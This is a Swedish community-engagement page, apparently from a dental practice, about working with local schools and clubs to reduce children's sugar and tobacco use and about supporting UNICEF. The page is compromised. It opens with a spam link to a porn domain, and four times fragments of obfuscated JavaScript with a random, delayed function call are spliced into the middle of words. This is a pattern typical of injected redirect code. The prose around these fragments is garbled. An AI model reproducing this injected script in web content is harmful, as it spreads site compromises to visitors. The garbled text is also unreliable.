Check Out Your URL yespornplease.vg

Samhällsengagemang   

 

Vi har ett starkt engagemang!

Vi anser att det är viktigt att vi engagerar oss i vår närmiljö. Därför vill vi ha ett nära samarbete med olika föreningar, skolor och sportklubbar i närområdet. Avsikten är att skapa goda relationer som kan ge bättre förutsättningar att påverka människor i sin vardag att ta handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and om sin tandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andhälsa, ex genom att påverka barn och ungdomar att minska på sockerkonsumtionen samt tobakvanor.

Kämpa för varenda unge!

Varje dag, året om kränks och utnyttjas barn medan omvärlden tittar på – eller bort. Så skulle det  inte behöva vara. Alla har vi ett val. Antingen gör du ingenting – eller så gör du någonting. Tillsammans kan vi förändra förutsättningarna för  miljontals barn världen över.

Det går att skydda barn mot våld,  övergrepp och exploatering. Det går att ge dem trygghet, utbildning och  mat för dagen. Och det går att befria barn från ett liv som soldat,  gatubarn eller prostituerad.

UNICEF, världens ledandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande  barnrättsorganisation, finns på plats i regeringskorridorer,  slumområden, flyktingläger och avlägsna byar och arbetar dygnet runt för att ALLA barn ska få den barndom som de har rätt till. Det handom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andlar om så självklara saker som till exempel rent vatten, vaccin mot dödliga sjukdomar, bra hälsovård, skola och skydd mot våld, övergrepp och diskriminering.

Gör som vi stöder bl.a. UNICEF!